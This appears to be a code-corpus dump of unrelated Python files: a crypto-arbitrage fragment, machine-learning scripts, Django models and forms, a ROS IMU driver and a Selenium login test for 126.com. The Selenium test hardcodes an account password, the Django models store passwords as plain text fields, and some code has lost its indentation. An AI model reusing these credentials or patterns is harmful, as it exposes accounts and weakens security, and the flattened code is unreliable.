withdraw = tradeclient2.withdraw_crypto(1, 'BTC', deposit_btc_bitfinex)
break
else:
print('Set up bitfinex deposit address')
break
time.sleep(1)
# Sell bitcoins at bitfinex
sell_order = tradeclient.place_order('1', str(bitfinex[1]), 'sell', 'exchange market')
# Get Deposit address for USD funds at exmo
dpt_usd_exmo = tradeclient2.deposit_usd()
# Withdraw funds from bitfinex USD account when an order is done
while True:
if isinstance(sell_order, str): # Check for error messages
print('Error Message: ', sell_order)
else:
order_id = sell_order['order_id']
try:
status_order = tradeclient.status_order(order_id)
except:
print('Error Message: Provide valid order id for a withdrawal.')
break
if status_order['remaining_amount'] == 0:
try:
dpt_usd_exmo['bank_account']
withdraw_usd = tradeclient.withdraw_usd(
'bitcoin', 'exchange', '1',
dpt_usd_exmo['bank_account'],
dpt_usd_exmo['bank_name'],
dpt_usd_exmo['bank_address'],
dpt_usd_exmo['usdbank_city'],
dpt_usd_exmo['bank_country']
)
break
except:
print('Error Message: Set up exmo usd account details for the withdrawal.')
break
time.sleep(1)
# Case 2: first exchange is cheaper than second
elif (float(exmo[1])-float(bitfinex[0]))*100/float(exmo[1]) > 1.5:
# Buy bitcoins at bitfinex
sell_order = tradeclient.place_order('1', str(bitfinex[0]), 'buy', 'exchange market')
# Get bitcoin deposit address at exmo
deposit_btc_exmo = tradeclient2.deposit_btc()
# Withdraw funds from bitfinex BTC account when an order is done
while True:
if isinstance(sell_order, str): # Check for error messages
print('Error Message: ', sell_order)
else:
order_id=sell_order['order_id']
try:
status_order = tradeclient.status_order(order_id)
except:
print('Error Message: Provide valid order id for a withdrawal')
break
if status_order['remaining_amount'] == 0:
if deposit_btc_exmo:
withdraw_usd = tradeclient.withdraw_crypto('bitcoin', 'exchange', '1', deposit_btc_exmo)
break
else:
print('Error Message: Set up exmo btc address')
break
time.sleep(1)
# Sell bitcoins at exmo
sell_order = tradeclient2.place_order('BTC_USD', 1, exmo[1], 'sell')
# Deposit USD funds to bitfinex
# Wire deposits at Bitinex have been paused.
print('Error Message: Cannot deposit USD funds. USD depoist at bitfinex is currently unavailable.')
# Withdraw usd from exmo to bitfinex
while True:
if isinstance(sell_order, str): # Check for error messages
print('Error Message: ', sell_order)
else:
            try:
                order_id = sell_order['order_id']
except:
print('Error: Provide valid order id')
break
try:
                status_order = tradeclient2.trade_deals('BTC_USD', 1)
except:
print('Error Message: you have no trade deals')
break
if status_order[0]['trade_id'] == order_id:
if deposit_btc_bitfinex:
withdraw = tradeclient2.withdraw_crypto(1, 'BTC', deposit_btc_bitfinex)
break
else:
print('Set up bitfinex deposit address')
break
time.sleep(1)
# Case 3: an exchange difference is below 1.5%
else:
# Do nothing if the rate diffrence is lower than 1.5%
print('Exchange rate difference is lower than 1.5%')
pass
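# Hypothetical helper (added for illustration, not part of the original script):
# both 1.5% checks above reduce to this percentage-spread calculation.
def _spread_pct(sell_price, buy_price):
    """Spread between the sell quote on one exchange and the buy quote on the
    other, as a percentage of the sell quote."""
    return (float(sell_price) - float(buy_price)) * 100 / float(sell_price)
# e.g. case 1 fires when _spread_pct(bitfinex[1], exmo[0]) > 1.5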
| [
"[email protected]"
] | |
f2245457405d0ab361d32a4bab82482856388e47 | bdd02d756c4ea770b4599ef9aa3292ee419acf35 | /logistic_regression.py | cadd18e7ca6e08905ce7aa764e756130fcae72b8 | [] | no_license | Jjrex8988/Python_Project_DS_Logistic_Regression_Classification | e8d1d5f6d6d13da8696b337152e9610117459486 | c48c1288fe91e6018566ddc56552852f205da94a | refs/heads/master | 2023-05-08T20:17:00.832817 | 2021-06-03T13:22:30 | 2021-06-03T13:22:30 | 373,514,890 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,170 | py | # Logistic Regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
print(X_train)
print('-' * 38)
print(y_train)
print('-' * 38)
print(X_test)
print('-' * 38)
print(y_test)
print('-' * 38)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
print(X_train)
print('-' * 38)
print(X_test)
print('-' * 38)
# Training the Logistic Regression model on the Training set
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state=0)
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
print(y_pred)
print('-' * 38)
print(np.concatenate((y_pred.reshape(len(y_pred), 1), y_test.reshape(len(y_test), 1)), 1))
print('-' * 38)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix, accuracy_score
cm = confusion_matrix(y_test, y_pred)
print(cm)
print('-' * 38)
print(accuracy_score(y_test, y_pred))
print('-' * 38)
# Applying k-Fold Cross Validation
from sklearn.model_selection import cross_val_score
accuracies = cross_val_score(estimator=classifier, X=X_train, y=y_train, cv=10)
print("Accuracy: {:.2f} %".format(accuracies.mean() * 100))
print('-' * 38)
print("Standard Deviation: {:.2f} %".format(accuracies.std() * 100))
print('-' * 38)
# Applying Grid Search to find the best model and the best parameters
from sklearn.model_selection import GridSearchCV
parameters = [{'C': [0.25, 0.5, 0.75, 1], 'penalty': ['l2']}]
grid_search = GridSearchCV(estimator=classifier,
param_grid=parameters,
scoring='accuracy',
cv=10,
n_jobs=-1)
grid_search.fit(X_train, y_train)
best_accuracy = grid_search.best_score_
best_parameters = grid_search.best_params_
print("Best Accuracy: {:.2f} %".format(best_accuracy * 100))
print('-' * 38)
print("Best Parameters:", best_parameters)
print('-' * 38)
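# Illustrative follow-up (hypothetical, not part of the original script): the tuned
# hyper-parameters could be fed back into a final model before visualising, e.g.
# classifier = LogisticRegression(C=best_parameters['C'], penalty='l2', random_state=0)
# classifier.fit(X_train, y_train)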
# # Visualising the Training set results
# from matplotlib.colors import ListedColormap
#
# X_set, y_set = sc.inverse_transform(X_train), y_train
# X1, X2 = np.meshgrid(np.arange(start=X_set[:, 0].min() - 10, stop=X_set[:, 0].max() + 10, step=0.25),
# np.arange(start=X_set[:, 1].min() - 1000, stop=X_set[:, 1].max() + 1000, step=0.25))
# plt.contourf(X1, X2, classifier.predict(sc.transform(np.array([X1.ravel(), X2.ravel()]).T)).reshape(X1.shape),
# alpha=0.75, cmap=ListedColormap(('red', 'green')))
# plt.xlim(X1.min(), X1.max())
# plt.ylim(X2.min(), X2.max())
# for i, j in enumerate(np.unique(y_set)):
# plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1], c=ListedColormap(('red', 'green'))(i), label=j)
# plt.title('Logistic Regression (Training set)')
# plt.xlabel('Age')
# plt.ylabel('Estimated Salary')
# plt.legend()
# plt.show()
#
#
# # Visualising the Test set results
# from matplotlib.colors import ListedColormap
#
# X_set, y_set = sc.inverse_transform(X_test), y_test
# X1, X2 = np.meshgrid(np.arange(start=X_set[:, 0].min() - 10, stop=X_set[:, 0].max() + 10, step=0.25),
# np.arange(start=X_set[:, 1].min() - 1000, stop=X_set[:, 1].max() + 1000, step=0.25))
# plt.contourf(X1, X2, classifier.predict(sc.transform(np.array([X1.ravel(), X2.ravel()]).T)).reshape(X1.shape),
# alpha=0.75, cmap=ListedColormap(('red', 'green')))
# plt.xlim(X1.min(), X1.max())
# plt.ylim(X2.min(), X2.max())
# for i, j in enumerate(np.unique(y_set)):
# plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1], c=ListedColormap(('red', 'green'))(i), label=j)
# plt.title('Logistic Regression (Test set)')
# plt.xlabel('Age')
# plt.ylabel('Estimated Salary')
# plt.legend()
# plt.show()
| [
"[email protected]"
] | |
a6f4a9ee2d2739446d5dcbb227234a4968947e70 | 5997170436ca5194798a3d439aaa3efd3315e4cf | /MedDonate/MedicalDonation/migrations/0001_initial.py | 40be556ff5c6d754bb4b403122ded9700d5c1d21 | [] | no_license | khush611/MedDonate | d6e327ce40e403e0c5c2dcad7514aa823b3d7308 | 14a67a5a860a25fb617c31ccd65a6a12b23b1508 | refs/heads/master | 2020-04-06T12:46:50.339471 | 2018-11-12T09:05:42 | 2018-11-12T09:05:42 | 157,470,339 | 0 | 0 | null | 2018-11-14T01:18:12 | 2018-11-14T01:18:12 | null | UTF-8 | Python | false | false | 2,033 | py | # Generated by Django 2.1.2 on 2018-11-10 08:56
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Collector',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64)),
('address', models.CharField(max_length=128)),
('pinCode', models.IntegerField()),
('Phone_no', models.IntegerField()),
('BirthDate', models.DateField()),
('UID', models.IntegerField(unique=True)),
('email', models.EmailField(max_length=64)),
('username', models.CharField(max_length=16, unique=True)),
('password', models.CharField(max_length=16)),
('Driving_License', models.CharField(max_length=32)),
('Driving_License_image', models.FileField(upload_to='photos/collector/DL')),
('image', models.FileField(upload_to='photos/collector')),
],
),
migrations.CreateModel(
name='Doner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64)),
('address', models.CharField(max_length=128)),
('pinCode', models.IntegerField()),
('Phone_no', models.IntegerField()),
('BirthDate', models.DateField()),
('UID', models.IntegerField(unique=True)),
('email', models.EmailField(max_length=64)),
('username', models.CharField(max_length=16, unique=True)),
('password', models.CharField(max_length=16)),
('image', models.FileField(upload_to='photos/doner')),
],
),
]
| [
"[email protected]"
] | |
53fbaa98a2fa8762b4331d9287ca48ffecc9af8a | 2eaecdb1ed42170463993b8b2285296c5ef2231d | /apps/declaraciontestigo/forms.py | e91d599b1d938015cd79ed8379cab26b2fd135c4 | [] | no_license | ivanfdaza/tribunaleclesiasticoIIS | 9639fc66a2c99baa45b8276f4a1e035bdf294e2e | acb164ab8464b71d0461acf03bdd5e3386b57893 | refs/heads/master | 2022-11-21T10:32:14.925326 | 2020-07-23T16:21:26 | 2020-07-23T16:21:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,284 | py | from django import forms
from django.forms import ClearableFileInput
from apps.declaraciontestigo.models import DeclaracionTestigo
class CustomClearableFileInput(ClearableFileInput):
template_with_clear = '<br> <label for="%(clear_checkbox_id)s">%(clear_checkbox_label)s</label> %(clear)s'
class DeclaracionTestigoForm(forms.ModelForm):
class Meta:
model = DeclaracionTestigo
fields = [
# 'proceso',
'nombre',
'fecha',
'testigo',
'observacion',
'docfile',
]
labels = {
# 'proceso': 'Proceso',
'nombre': 'Declaración',
'fecha': 'Fecha',
'testigo': 'Testigo',
'observacion': 'Observación',
'docfile': 'Documento',
}
widgets = {
# 'proceso': forms.Select(attrs={'class': 'form-control'}),
'nombre': forms.Select(attrs={'class': 'form-control'}),
'fecha': forms.SelectDateWidget(attrs={'class': 'form-control'}, years=range(2000, 2050)),
'testigo': forms.Select(attrs={'class': 'form-control'}),
'observacion': forms.Textarea(attrs={'class': 'form-control'}),
'docfile': CustomClearableFileInput,
}
| [
"[email protected]"
] | |
1071e0a432e040c2ffbd0f2afeffdd349b12ae0c | 7b52e887588f8ff050d5f5a9174cb397d8a3f5e5 | /odom_scooter/razor_imu_9dof/nodes/imu_node.py | c68e7f55c2bdb27e129022a419dffbc72fd813e7 | [] | no_license | RajathSwaroop/Autonomous-Scooter | d57d3f87b107924189051de52ca32d0de7a11984 | 9958293bab33b2f19169d0132e3f3a0e5ed2e0be | refs/heads/master | 2021-08-26T06:44:08.401345 | 2017-11-22T00:41:12 | 2017-11-22T00:41:12 | 111,488,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,919 | py | #!/usr/bin/env python
# Copyright (c) 2012, Tang Tiong Yew
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import rospy
import serial
import string
import math
import sys
#from time import time
from sensor_msgs.msg import Imu
from tf.transformations import quaternion_from_euler
from dynamic_reconfigure.server import Server
from razor_imu_9dof.cfg import imuConfig
from diagnostic_msgs.msg import DiagnosticArray, DiagnosticStatus, KeyValue
degrees2rad = math.pi/180.0
imu_yaw_calibration = 0.0
# Callback for dynamic reconfigure requests
def reconfig_callback(config, level):
global imu_yaw_calibration
rospy.loginfo("""Reconfigure request for yaw_calibration: %d""" %(config['yaw_calibration']))
#if imu_yaw_calibration != config('yaw_calibration'):
imu_yaw_calibration = config['yaw_calibration']
rospy.loginfo("Set imu_yaw_calibration to %d" % (imu_yaw_calibration))
return config
rospy.init_node("razor_node")
#We only care about the most recent measurement, i.e. queue_size=1
pub = rospy.Publisher('imu', Imu, queue_size=1)
srv = Server(imuConfig, reconfig_callback) # define dynamic_reconfigure callback
diag_pub = rospy.Publisher('diagnostics', DiagnosticArray, queue_size=1)
diag_pub_time = rospy.get_time()
imuMsg = Imu()
# Orientation covariance estimation:
# Observed orientation noise: 0.3 degrees in x, y, 0.6 degrees in z
# Magnetometer linearity: 0.1% of full scale (+/- 2 gauss) => 4 milligauss
# Earth's magnetic field strength is ~0.5 gauss, so magnetometer nonlinearity could
# cause ~0.8% yaw error (4mgauss/0.5 gauss = 0.008) => 2.8 degrees, or 0.050 radians
# i.e. variance in yaw: 0.0025
# Accelerometer non-linearity: 0.2% of 4G => 0.008G. This could cause
# static roll/pitch error of 0.8%, owing to gravity orientation sensing
# error => 2.8 degrees, or 0.05 radians. i.e. variance in roll/pitch: 0.0025
# so set all covariances the same.
imuMsg.orientation_covariance = [
0.0025 , 0 , 0,
0, 0.0025, 0,
0, 0, 0.0025
]
# Angular velocity covariance estimation:
# Observed gyro noise: 4 counts => 0.28 degrees/sec
# nonlinearity spec: 0.2% of full scale => 8 degrees/sec = 0.14 rad/sec
# Choosing the larger (0.14) as std dev, variance = 0.14^2 ~= 0.02
imuMsg.angular_velocity_covariance = [
0.02, 0 , 0,
0 , 0.02, 0,
0 , 0 , 0.02
]
# linear acceleration covariance estimation:
# observed acceleration noise: 5 counts => 20milli-G's ~= 0.2m/s^2
# nonlinearity spec: 0.5% of full scale => 0.2m/s^2
# Choosing 0.2 as std dev, variance = 0.2^2 = 0.04
imuMsg.linear_acceleration_covariance = [
0.04 , 0 , 0,
0 , 0.04, 0,
0 , 0 , 0.04
]
default_port='/dev/ttyACM1'
port = rospy.get_param('~port', default_port)
#read calibration parameters
#accelerometer
accel_x_min = rospy.get_param('~accel_x_min', -250.0)
accel_x_max = rospy.get_param('~accel_x_max', 250.0)
accel_y_min = rospy.get_param('~accel_y_min', -250.0)
accel_y_max = rospy.get_param('~accel_y_max', 250.0)
accel_z_min = rospy.get_param('~accel_z_min', -250.0)
accel_z_max = rospy.get_param('~accel_z_max', 250.0)
# magnetometer
magn_x_min = rospy.get_param('~magn_x_min', -600.0)
magn_x_max = rospy.get_param('~magn_x_max', 600.0)
magn_y_min = rospy.get_param('~magn_y_min', -600.0)
magn_y_max = rospy.get_param('~magn_y_max', 600.0)
magn_z_min = rospy.get_param('~magn_z_min', -600.0)
magn_z_max = rospy.get_param('~magn_z_max', 600.0)
calibration_magn_use_extended = rospy.get_param('~calibration_magn_use_extended', False)
magn_ellipsoid_center = rospy.get_param('~magn_ellipsoid_center', [0, 0, 0])
magn_ellipsoid_transform = rospy.get_param('~magn_ellipsoid_transform', [[0, 0, 0], [0, 0, 0], [0, 0, 0]])
imu_yaw_calibration = rospy.get_param('~imu_yaw_calibration', 0.0)
# gyroscope
gyro_average_offset_x = rospy.get_param('~gyro_average_offset_x', 0.0)
gyro_average_offset_y = rospy.get_param('~gyro_average_offset_y', 0.0)
gyro_average_offset_z = rospy.get_param('~gyro_average_offset_z', 0.0)
#rospy.loginfo("%f %f %f %f %f %f", accel_x_min, accel_x_max, accel_y_min, accel_y_max, accel_z_min, accel_z_max)
#rospy.loginfo("%f %f %f %f %f %f", magn_x_min, magn_x_max, magn_y_min, magn_y_max, magn_z_min, magn_z_max)
#rospy.loginfo("%s %s %s", str(calibration_magn_use_extended), str(magn_ellipsoid_center), str(magn_ellipsoid_transform[0][0]))
#rospy.loginfo("%f %f %f", gyro_average_offset_x, gyro_average_offset_y, gyro_average_offset_z)
# Check your COM port and baud rate
rospy.loginfo("Opening %s...", port)
try:
ser = serial.Serial(port=port, baudrate=57600, timeout=1)
except serial.serialutil.SerialException:
rospy.logerr("IMU not found at port "+port + ". Did you specify the correct port in the launch file?")
#exit
sys.exit(0)
roll=0
pitch=0
yaw=0
seq=0
accel_factor = 9.806 / 256.0 # sensor reports accel as 256.0 = 1G (9.8m/s^2). Convert to m/s^2.
rospy.loginfo("Giving the razor IMU board 5 seconds to boot...")
rospy.sleep(5) # Sleep for 5 seconds to wait for the board to boot
### configure board ###
#stop datastream
ser.write('#o0' + chr(13))
#discard old input
#automatic flush - NOT WORKING
#ser.flushInput() #discard old input, still in invalid format
#flush manually, as above command is not working
discard = ser.readlines()
#set output mode
ser.write('#ox' + chr(13)) # To start display angle and sensor reading in text
rospy.loginfo("Writing calibration values to razor IMU board...")
#set calibration values
ser.write('#caxm' + str(accel_x_min) + chr(13))
ser.write('#caxM' + str(accel_x_max) + chr(13))
ser.write('#caym' + str(accel_y_min) + chr(13))
ser.write('#cayM' + str(accel_y_max) + chr(13))
ser.write('#cazm' + str(accel_z_min) + chr(13))
ser.write('#cazM' + str(accel_z_max) + chr(13))
if (not calibration_magn_use_extended):
ser.write('#cmxm' + str(magn_x_min) + chr(13))
ser.write('#cmxM' + str(magn_x_max) + chr(13))
ser.write('#cmym' + str(magn_y_min) + chr(13))
ser.write('#cmyM' + str(magn_y_max) + chr(13))
ser.write('#cmzm' + str(magn_z_min) + chr(13))
ser.write('#cmzM' + str(magn_z_max) + chr(13))
else:
ser.write('#ccx' + str(magn_ellipsoid_center[0]) + chr(13))
ser.write('#ccy' + str(magn_ellipsoid_center[1]) + chr(13))
ser.write('#ccz' + str(magn_ellipsoid_center[2]) + chr(13))
ser.write('#ctxX' + str(magn_ellipsoid_transform[0][0]) + chr(13))
ser.write('#ctxY' + str(magn_ellipsoid_transform[0][1]) + chr(13))
ser.write('#ctxZ' + str(magn_ellipsoid_transform[0][2]) + chr(13))
ser.write('#ctyX' + str(magn_ellipsoid_transform[1][0]) + chr(13))
ser.write('#ctyY' + str(magn_ellipsoid_transform[1][1]) + chr(13))
ser.write('#ctyZ' + str(magn_ellipsoid_transform[1][2]) + chr(13))
ser.write('#ctzX' + str(magn_ellipsoid_transform[2][0]) + chr(13))
ser.write('#ctzY' + str(magn_ellipsoid_transform[2][1]) + chr(13))
ser.write('#ctzZ' + str(magn_ellipsoid_transform[2][2]) + chr(13))
ser.write('#cgx' + str(gyro_average_offset_x) + chr(13))
ser.write('#cgy' + str(gyro_average_offset_y) + chr(13))
ser.write('#cgz' + str(gyro_average_offset_z) + chr(13))
#print calibration values for verification by user
ser.flushInput()
ser.write('#p' + chr(13))
calib_data = ser.readlines()
calib_data_print = "Printing set calibration values:\r\n"
for line in calib_data:
calib_data_print += line
rospy.loginfo(calib_data_print)
#start datastream
ser.write('#o1' + chr(13))
#automatic flush - NOT WORKING
#ser.flushInput() #discard old input, still in invalid format
#flush manually, as above command is not working - it breaks the serial connection
rospy.loginfo("Flushing first 200 IMU entries...")
for x in range(0, 200):
line = ser.readline()
rospy.loginfo("Publishing IMU data...")
#f = open("raw_imu_data.log", 'w')
while not rospy.is_shutdown():
line = ser.readline()
line = line.replace("#YPRAG=","") # Delete "#YPRAG="
#f.write(line) # Write to the output log file
words = string.split(line,",") # Fields split
if len(words) > 2:
#in AHRS firmware z axis points down, in ROS z axis points up (see REP 103)
yaw_deg = -float(words[0])
yaw_deg = yaw_deg + imu_yaw_calibration
if yaw_deg > 180.0:
yaw_deg = yaw_deg - 360.0
if yaw_deg < -180.0:
yaw_deg = yaw_deg + 360.0
yaw = yaw_deg*degrees2rad
#in AHRS firmware y axis points right, in ROS y axis points left (see REP 103)
pitch = -float(words[1])*degrees2rad
roll = float(words[2])*degrees2rad
# Publish message
# AHRS firmware accelerations are negated
# This means y and z are correct for ROS, but x needs reversing
imuMsg.linear_acceleration.x = -float(words[3]) * accel_factor
imuMsg.linear_acceleration.y = float(words[4]) * accel_factor
imuMsg.linear_acceleration.z = float(words[5]) * accel_factor
imuMsg.angular_velocity.x = float(words[6])
#in AHRS firmware y axis points right, in ROS y axis points left (see REP 103)
imuMsg.angular_velocity.y = -float(words[7])
#in AHRS firmware z axis points down, in ROS z axis points up (see REP 103)
imuMsg.angular_velocity.z = -float(words[8])
q = quaternion_from_euler(roll,pitch,yaw)
imuMsg.orientation.x = q[0]
imuMsg.orientation.y = q[1]
imuMsg.orientation.z = q[2]
imuMsg.orientation.w = q[3]
imuMsg.header.stamp= rospy.Time.now()
imuMsg.header.frame_id = 'base_imu_link'
imuMsg.header.seq = seq
seq = seq + 1
pub.publish(imuMsg)
if (diag_pub_time < rospy.get_time()) :
diag_pub_time += 1
diag_arr = DiagnosticArray()
diag_arr.header.stamp = rospy.get_rostime()
diag_arr.header.frame_id = '1'
diag_msg = DiagnosticStatus()
diag_msg.name = 'Razor_Imu'
diag_msg.level = DiagnosticStatus.OK
diag_msg.message = 'Received AHRS measurement'
diag_msg.values.append(KeyValue('roll (deg)',
str(roll*(180.0/math.pi))))
diag_msg.values.append(KeyValue('pitch (deg)',
str(pitch*(180.0/math.pi))))
diag_msg.values.append(KeyValue('yaw (deg)',
str(yaw*(180.0/math.pi))))
diag_msg.values.append(KeyValue('sequence number', str(seq)))
diag_arr.status.append(diag_msg)
diag_pub.publish(diag_arr)
ser.close()
#f.close()
| [
"[email protected]"
] | |
50c1da7e80d158879591350990e06900b4c06536 | a90ba4acf951e0f26e625bb52eeba52424b2604f | /Test126/_______test_logon.py | 641676382843377a4e18b8f41ceaee1d5a4f5cdc | [] | no_license | ihtwang/test | 88c340c93da35b41dc249b367081ebb9c74c8640 | bdf8dc80183886a0165e79571f95d50f96099d83 | refs/heads/master | 2021-05-04T19:06:35.507378 | 2018-03-23T13:45:49 | 2018-03-23T13:45:49 | 106,656,978 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,854 | py | # -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest, time, re
class TestLogon(unittest.TestCase):
def setUp(self):
        # Path to the Firefox profile directory
        profile_directory = r"C:\Users\IBM_ADMIN\AppData\Roaming\Mozilla\Firefox\Profiles\3fyggsfu.default"
        # Load the profile settings
        profile = webdriver.FirefoxProfile(profile_directory)
        # Launch the browser with this profile
self.driver = webdriver.Firefox(profile)
#self.driver = webdriver.Firefox()
self.driver.implicitly_wait(30)
self.base_url = "http://www.126.com/"
self.verificationErrors = []
self.accept_next_alert = True
def test_logon(self):
driver = self.driver
driver.get(self.base_url + "/")
#driver.find_element_by_id("auto-id-1505045564984").clear()
#driver.find_element_by_id("auto-id-1505045564984").send_keys("Wzj1234abcd20")
frame = driver.find_element_by_id('x-URS-iframe')
driver.switch_to_frame(frame)
        # Replace XXXX below with your own username and password
#driver.find_element_by_css_selector("form input[name='email']").clear()
#driver.find_element_by_css_selector("form input[name='email']").send_keys("iht_wang")
#time.sleep(1)
#driver.find_element_by_css_selector("form input[name='password']").clear()
#driver.find_element_by_css_selector("form input[name='password']").send_keys("Wzj1234abcd20")
#time.sleep(1)
prompt_info = u"帐号或密码错误"
driver.find_element_by_name("email").clear()
driver.find_element_by_name("email").send_keys("iht_wang1")
driver.find_element_by_name("password").clear()
driver.find_element_by_name("password").send_keys("Wzj1234abcd20")
driver.find_element_by_id("dologin").click()
time.sleep(10)
#获取断言信息进行断言
#text = driver.find_element_by_xpath("//div[@class='error-tt']/p").text
text = driver.find_element_by_xpath("//div[@class='ferrorhead']").text
print u"****" + text
self.assertEqual(text,prompt_info)
#driver.switch_to_default_content()
#text_ = driver.find_element_by_xpath("//*[@id='spnUid']").text
#text_ = driver.find_element_by_css_selector('#spnUid').text
#text_ = driver.find_element_by_id("spnUid").text
#print u"****" + text_
#self.assertEqual("[email protected]", text_)
#time.sleep(10)
#print u"准备退出。。。"
#driver.find_element_by_link_text(u"退出").click()
#print u"退出了"
#time.sleep(15)
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
except NoSuchElementException as e: return False
return True
def is_alert_present(self):
try: self.driver.switch_to_alert()
except NoAlertPresentException as e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def tearDown(self):
#self.driver.quit()
print u"准备关闭浏览器。。。"
time.sleep(15)
self.driver.close()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
bea8903df605768e2ecbcbbb21b445fb05b897d0 | 7aadd04d68c16d8e019cf1ae5e3a7a794987a7ab | /Lesson 2/script_7.py | 77f905314909dc41dad57f2b0e805c21c24cfea8 | [] | no_license | TheJodok/NLP-Python | 4267974b79f439fecf5cdae6ffbf2539a23b97de | 840e8e0d63b5400f1300129be5a4a5c197002bf9 | refs/heads/main | 2023-06-14T13:46:21.304858 | 2021-07-14T07:30:37 | 2021-07-14T07:30:37 | 385,835,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | from reviews import counter, training_counts
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
# Add your review:
review = "Very much learned, such wow, much cool. AI ML NLP fantastic. Speech and Text nice"
review_counts = counter.transform([review])
classifier = MultinomialNB()
training_labels = [0] * 1000 + [1] * 1000
classifier.fit(training_counts, training_labels)
neg = (classifier.predict_proba(review_counts)[0][0] * 100).round()
pos = (classifier.predict_proba(review_counts)[0][1] * 100).round()
if pos > 50:
print("Thank you for your positive review!")
elif neg > 50:
print("We're sorry this hasn't been the best possible lesson for you! We're always looking to improve.")
else:
print("Naive Bayes cannot determine if this is negative or positive. Thank you or we're sorry?")
print("\nAccording to our trained Naive Bayes classifier, the probability that your review was negative was {0}% and the probability it was positive was {1}%.".format(neg, pos)) | [
"[email protected]"
] | |
5ac3d814652dd657e78fb92b8385273d7f562be6 | 9094acb185a2fd1adf70cefa633ed01c7b290149 | /src/seplis/indexer/__init__.py | dddf999669b83cc81c4cc51641bfb060f8744d72 | [] | no_license | jonathan1994/seplis | 65887c1ecfc27bbef5b97820eba731e6ba043601 | d97925b18b67a321d88c0901455cf2fdc14a82c8 | refs/heads/master | 2021-01-17T17:18:16.820975 | 2014-11-28T00:32:04 | 2014-11-28T00:32:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 47 | py | from seplis.indexer.indexer import Show_indexer | [
"[email protected]"
] | |
4c9469f52887fcd668fc289b805b599c3f1bd310 | 8712509880af7544115733099861ac3bb9e818cf | /DeepLearning_AndrewNg_coursera/1neural-network-deep-learning/assignment3/code.py | 2738b146b71dcf7a2441e15bfbc14a3a92adae40 | [] | no_license | most-corner/deeplearning | 94152b111ccefeaa4317093f62e2616cad90d4af | aefe5542cc46f285b4ff34e90212a0e29cc2f5c5 | refs/heads/master | 2020-06-11T22:30:44.216540 | 2019-07-01T14:21:10 | 2019-07-01T14:21:10 | 194,107,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,892 | py | # 1-Packages
import numpy as np
import matplotlib.pyplot as plt
from testCases_v2 import *
import sklearn
import sklearn.datasets
import sklearn.linear_model
from planar_utils import plot_decision_boundary, sigmoid, load_planar_dataset, load_extra_datasets
np.random.seed(1) # set a seed so that the results are consistent
# 2-Dataset
"""
X, Y = load_planar_dataset()
# Visualize the data:
plt.scatter(X[0, :], X[1, :], c = Y.reshape(400), s=40, cmap=plt.cm.Spectral);
# shape of data
shape_X = X.shape
shape_Y = Y.shape
m = X.shape[1]
print("The shape of X is: " + str(shape_X))
print("The shape of Y is: " + str(shape_Y))
print("I have m = %d training examples!" % (m))
"""
# Datasets
